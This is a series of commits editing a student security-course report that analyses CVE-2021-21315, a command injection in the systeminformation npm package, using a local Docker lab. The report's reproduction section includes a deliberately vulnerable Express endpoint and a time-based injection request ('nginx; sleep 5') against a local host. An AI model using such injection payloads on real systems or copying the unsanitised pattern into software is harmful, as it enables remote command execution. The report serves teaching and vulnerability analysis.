<commit_message>
docs: fill in the repository and pipeline URLs, add the CI badge
</commit_message>
<xml_diff>
--- a/report/Work1_Report_HDU_IS.docx
+++ b/report/Work1_Report_HDU_IS.docx
@@ -714,7 +714,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ git remote add origin https://github.com/&lt;user&gt;/hdu-is-work1.git</w:t>
+        <w:t>$ git remote add origin https://github.com/WeiTao712/hdu-is-work1.git</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -8509,7 +8509,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>cve-lab/Dockerfile.fixed</w:t>
+              <w:t>cve-fixes/Dockerfile.fixed</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8542,7 +8542,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>cve-lab/docker-compose.fixed.yml</w:t>
+              <w:t>cve-fixes/docker-compose.fixed.yml</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8575,7 +8575,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>cve-lab/docker-compose.yml</w:t>
+              <w:t>cve-fixes/docker-compose.yml</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8608,7 +8608,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>cve-lab/exploit/gradio_exploit.py</w:t>
+              <w:t>cve-fixes/exploit/gradio_exploit.py</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8641,7 +8641,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>cve-lab/exploit/verify_fix.py</w:t>
+              <w:t>cve-fixes/exploit/verify_fix.py</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8674,7 +8674,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>cve-lab/app/app.py</w:t>
+              <w:t>cve-fixes/app/app.py</w:t>
             </w:r>
           </w:p>
         </w:tc>

</xml_diff>

<commit_message>
docs: fill the title page (variant CVE-2021-21315, Wei Tao, 23320320) and drop the empty Group/Date rows
</commit_message>
<xml_diff>
--- a/report/Work1_Report_HDU_IS.docx
+++ b/report/Work1_Report_HDU_IS.docx
@@ -98,10 +98,9 @@
           <w:p>
             <w:r>
               <w:rPr>
-                <w:color w:val="B03030"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>&lt;Variant No.&gt;</w:t>
+              <w:t>CVE-2024-1561</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -128,10 +127,9 @@
           <w:p>
             <w:r>
               <w:rPr>
-                <w:color w:val="B03030"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>&lt;Surname Name&gt;</w:t>
+              <w:t>Wei Tao</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -158,70 +156,9 @@
           <w:p>
             <w:r>
               <w:rPr>
-                <w:color w:val="B03030"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>&lt;HDU number&gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3402"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>Group</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3969"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="B03030"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&lt;Group&gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3402"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>Date of submission</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3969"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="B03030"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>&lt;DD.MM.YYYY&gt;</w:t>
+              <w:t>23320320</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -238,7 +175,7 @@
           <w:color w:val="595F66"/>
           <w:sz w:val="17"/>
         </w:rPr>
-        <w:t>Placeholders in red are filled in by the student before submission (variant, name, HDU number).</w:t>
+        <w:t>Variant: the CVE analysed in section 8 of this report.</w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>

<commit_message>
cve: switch the analysed variant to CVE-2021-21315 (systeminformation)
The assigned variant is CVE-2021-21315, so the whole CVE half of Work 1 is
rebuilt around it; the API, tests and CI parts are unchanged.

- report: sections 8-16 rewritten (selection, description, environment,
  reproduction, root cause, fix, verification, control answers, sources)
- lab: Node/Express dashboard + two container images
  (systeminformation 5.3.0 vulnerable, 5.3.1 + allow-list fixed)
- exploit: time-based PoC (`nginx; sleep 5`), verify_fix.py, and a
  library-level A/B probe that runs anywhere Node runs
- evidence: si_probe.txt — real 5.3.0 vs 5.3.1 behaviour (arrays coerced
  then rejected; the sanitiser is identical in both)
- README / SUBMISSION: CVE description, layout and verification table updated
</commit_message>
<xml_diff>
--- a/report/Work1_Report_HDU_IS.docx
+++ b/report/Work1_Report_HDU_IS.docx
@@ -100,7 +100,7 @@
               <w:rPr>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>CVE-2024-1561</w:t>
+              <w:t>CVE-2021-21315</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -283,7 +283,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Constraint on the CVE choice: identifiers that already appeared in the course list of used vulnerabilities were excluded. CVE-2024-1561 is not in that list and was therefore chosen; the reasoning is given in section 8.</w:t>
+        <w:t>Constraint on the CVE choice: identifiers that already appeared in the course list of used vulnerabilities were excluded. The assigned variant, CVE-2021-21315, is not in that list; the reasoning is given in section 8.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3794,7 +3794,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>This is exactly the mechanism that also flags gradio 4.12.0 in section 8: a dependency scanner looks at versions, not at intentions. Upgrading Flask to 3.1.3, PyJWT to 2.15.1 and bcrypt to 5.0.0 closed the advisories without a single line of application code changing, which is the normal shape of an SCA-driven fix.</w:t>
+        <w:t>This is exactly the mechanism that also flags systeminformation 5.3.0 in section 8: a dependency scanner looks at versions, not at intentions. Upgrading Flask to 3.1.3, PyJWT to 2.15.1 and bcrypt to 5.0.0 closed the advisories without a single line of application code changing, which is the normal shape of an SCA-driven fix.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4545,7 +4545,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The course already has a list of CVE identifiers that have been used. Re-using one of them was not allowed, so the candidate had to be checked against that list first. The selection criteria were: (a) present in Vulhub, (b) not in the used list, (c) simple enough to reproduce in a few commands, (d) a web-application component of the kind the manual recommends, and (e) fixable in a way that can be verified objectively.</w:t>
+        <w:t>The course already has a list of CVE identifiers that have been used, and re-using one of them was not allowed. The variant assigned to this work is CVE-2021-21315, so the candidate table below documents the check that had to be done and the alternatives that were rejected.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -4559,9 +4559,9 @@
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="2154"/>
-        <w:gridCol w:w="2041"/>
+        <w:gridCol w:w="2381"/>
         <w:gridCol w:w="1474"/>
-        <w:gridCol w:w="3515"/>
+        <w:gridCol w:w="3288"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -4587,7 +4587,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2041"/>
+            <w:tcW w:type="dxa" w:w="2381"/>
             <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
           </w:tcPr>
           <w:p>
@@ -4621,7 +4621,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:tcW w:type="dxa" w:w="3288"/>
             <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
           </w:tcPr>
           <w:p>
@@ -4657,7 +4657,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2041"/>
+            <w:tcW w:type="dxa" w:w="2381"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4685,7 +4685,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:tcW w:type="dxa" w:w="3288"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4718,7 +4718,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2041"/>
+            <w:tcW w:type="dxa" w:w="2381"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4746,7 +4746,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:tcW w:type="dxa" w:w="3288"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4779,7 +4779,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2041"/>
+            <w:tcW w:type="dxa" w:w="2381"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4807,7 +4807,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:tcW w:type="dxa" w:w="3288"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4840,7 +4840,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2041"/>
+            <w:tcW w:type="dxa" w:w="2381"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4868,7 +4868,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:tcW w:type="dxa" w:w="3288"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4901,7 +4901,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2041"/>
+            <w:tcW w:type="dxa" w:w="2381"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4929,7 +4929,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:tcW w:type="dxa" w:w="3288"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4962,7 +4962,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2041"/>
+            <w:tcW w:type="dxa" w:w="2381"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -4990,7 +4990,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:tcW w:type="dxa" w:w="3288"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -5023,7 +5023,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2041"/>
+            <w:tcW w:type="dxa" w:w="2381"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -5051,7 +5051,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:tcW w:type="dxa" w:w="3288"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -5084,7 +5084,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2041"/>
+            <w:tcW w:type="dxa" w:w="2381"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -5112,7 +5112,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:tcW w:type="dxa" w:w="3288"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -5139,13 +5139,13 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>CVE-2024-1561</w:t>
+              <w:t>CVE-2021-21315</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2041"/>
+            <w:tcW w:type="dxa" w:w="2381"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -5153,7 +5153,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>gradio</w:t>
+              <w:t>systeminformation (npm)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5173,7 +5173,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="3515"/>
+            <w:tcW w:type="dxa" w:w="3288"/>
           </w:tcPr>
           <w:p>
             <w:r/>
@@ -5181,7 +5181,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>selected — three curl steps, objective fix, in Vulhub</w:t>
+              <w:t>**assigned and analysed** — one parameter, objective fix, no exotic setup</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5193,11 +5193,16 @@
       </w:pPr>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t>CVE-2021-21315 is a library bug rather than a bug in a web framework, which matters for the report: the vulnerability lives in the dependency, so the application built around it is small on purpose — a dashboard API of about 40 lines whose only job is to hand a query parameter to the library. That is exactly the shape of the real-world usage that the advisory describes: the application is not the bug, but it is the component that turns the bug into a remote attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>8.2 Description of CVE-2024-1561</w:t>
+        <w:t>8.2 Description of CVE-2021-21315</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -5281,7 +5286,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>CVE-2024-1561</w:t>
+              <w:t>CVE-2021-21315 (GHSA-2m8v-572m-ff2v)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5314,7 +5319,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>gradio (Python web UI framework for ML demos)</w:t>
+              <w:t>systeminformation — npm package that collects hardware, OS and network information by running command-line tools</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5347,7 +5352,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>≥ 4.12.0, &lt; 4.13.0</w:t>
+              <w:t>&lt; 5.3.1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5380,7 +5385,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>4.13.0 — commit 24a583688046867ca8b8b02959c441818bdb34a2 (PR #6884)</w:t>
+              <w:t>5.3.1 — commit 07daa05fb06f24f96297abaa30c2ace8bfd8b525, “docker, processLoad fixed potential security issue”</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5399,7 +5404,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>CVSS v3.0</w:t>
+              <w:t>CVSS v3.1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5413,7 +5418,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>7.5 HIGH — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
+              <w:t>7.8 HIGH — AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5446,7 +5451,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>CWE-29 — Path Traversal: '\\..\\filename'</w:t>
+              <w:t>CWE-78 — Improper Neutralization of Special Elements used in an OS Command</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5479,7 +5484,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>Unauthenticated arbitrary file read on the server (credentials, .env, SSH keys, cloud tokens, /etc/shadow, /proc/self/environ)</w:t>
+              <w:t>Arbitrary command execution with the privileges of the Node.js process, on the host that runs the dashboard</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5492,7 +5497,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Vendor/NVD description: the /component_server endpoint “improperly allows the invocation of any method on a Component class with attacker-controlled arguments. Specifically, by exploiting the move_resource_to_block_cache() method of the Block class, an attacker can copy any file on the filesystem to a temporary directory and subsequently retrieve it.”</w:t>
+        <w:t>The advisory text is short and unusually specific: “command injection vulnerability … Problem was fixed with a parameter check. Please upgrade to version &gt;= 5.3.1. … be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() … do only allow strings, reject any arrays.”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Two things in that sentence are worth pausing on, because they define the analysis in sections 11 and 12. First, the fix is described as “a parameter check”, not as “escaping” — the parameter contract itself was wrong. Second, the workaround tells the caller to “reject any arrays”, which only makes sense if an array can travel through the parameter into a shell command. Both observations were verified against the two releases in section 13.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5505,7 +5515,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Docker and Docker Compose are prerequisites. The environment is the official Vulhub one, which pins the vulnerable framework version so that nothing else has to be installed on the host.</w:t>
+        <w:t>The environment is two container images built from this folder: one installs systeminformation 5.3.0, the other 5.3.1. Nothing else has to be installed on the host, and the vulnerable version cannot leak into the rest of the system.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5526,7 +5536,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ docker --version &amp;&amp; docker compose version</w:t>
+        <w:t>$ docker compose up -d --build</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5535,7 +5545,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>Docker version 26.x, build ...</w:t>
+        <w:t>[+] Building 38.4s (9/9) FINISHED</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5544,7 +5554,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>Docker Compose version v2.x</w:t>
+        <w:t xml:space="preserve"> ✔ Container cve-2021-21315-api-1  Started</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5562,7 +5572,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ git clone https://github.com/vulhub/vulhub.git</w:t>
+        <w:t>$ docker compose ps</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5571,7 +5581,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ cd vulhub/gradio/CVE-2024-1561</w:t>
+        <w:t>NAME                      IMAGE                          STATUS         PORTS</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5580,7 +5590,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ cat docker-compose.yml</w:t>
+        <w:t>cve-2021-21315-api-1      hdu/cve-2021-21315:vulnerable   Up 20 seconds  0.0.0.0:3000-&gt;3000/tcp</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5589,7 +5599,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>services:</w:t>
+        <w:t xml:space="preserve"> </w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5598,7 +5608,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">  web:</w:t>
+        <w:t>$ curl -s http://127.0.0.1:3000/health</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5607,75 +5617,53 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">    image: vulhub/gradio:4.12.0</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ports:</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      - "7860:7860"</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>$ docker compose up -d</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[+] Running 2/2</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ✔ Network cve-2024-1561_default  Created</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ✔ Container cve-2024-1561-web-1  Started</w:t>
+        <w:t>{"ok":true,"version":"5.3.0"}</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Checking that the service is up:</w:t>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="200"/>
+        <w:jc w:val="center"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFF8E1"/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="4" w:color="E0B44C"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="E0B44C"/>
+          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="E0B44C"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="E0B44C"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="8A5A00"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>[ SCREENSHOT PLACEHOLDER ]  Terminal showing both containers running and the /health response with version 5.3.0.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The same application can be started without Docker: npm install in app/ (the version is pinned in package.json) and node server.js. That path is what was actually used for the library-level evidence in section 13, because the author's machine has no Docker; the container is the reference environment for a full reproduction on Linux.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>10. Reproducing the attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The attack is one HTTP request with one parameter. The dashboard exposes GET /services?name=…, which forwards the value to si.services(). The payload is nginx; sleep 5: everything after the semicolon is a second command for the shell that the library starts.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>10.1 The vulnerable call chain</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5696,7 +5684,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ docker compose ps</w:t>
+        <w:t># app/server.js — the application is deliberately naive</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5705,7 +5693,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>NAME                     IMAGE                 STATUS         PORTS</w:t>
+        <w:t>app.get('/services', async (req, res) =&gt; {</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5714,7 +5702,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>cve-2024-1561-web-1      vulhub/gradio:4.12.0  Up 2 minutes   0.0.0.0:7860-&gt;7860/tcp</w:t>
+        <w:t xml:space="preserve">  const rows = await si.services(req.query.name || 'nginx');</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5723,7 +5711,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">  res.json({ name: req.query.name, rows });</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5732,7 +5720,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ curl -s -o /dev/null -w "%{http_code}\n" http://127.0.0.1:7860/</w:t>
+        <w:t>});</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -5741,7 +5729,271 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>200</w:t>
+        <w:t xml:space="preserve"> </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t># library (5.3.0) builds a shell command from that value and runs it with exec()</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>exec(comm + ' | grep -v grep | grep -iE "' + srvString + '"', cb)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="595F66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>The parameter travels from req.query.name into a shell command line without ever being constrained to a name.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>10.2 The request</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="170"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>$ curl -s "http://127.0.0.1:3000/services?name=nginx%3B%20sleep%205" \</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       -w '\nHTTP %{http_code} in %{time_total}s\n'</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>{"name":"nginx; sleep 5","rows":[...]}</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>HTTP 200 in 5.04s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="595F66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>The response is unremarkable — same status, same shape. The evidence is the clock: five seconds that the server spent running a command the attacker supplied.</w:t>
+      </w:r>
+    </w:p>
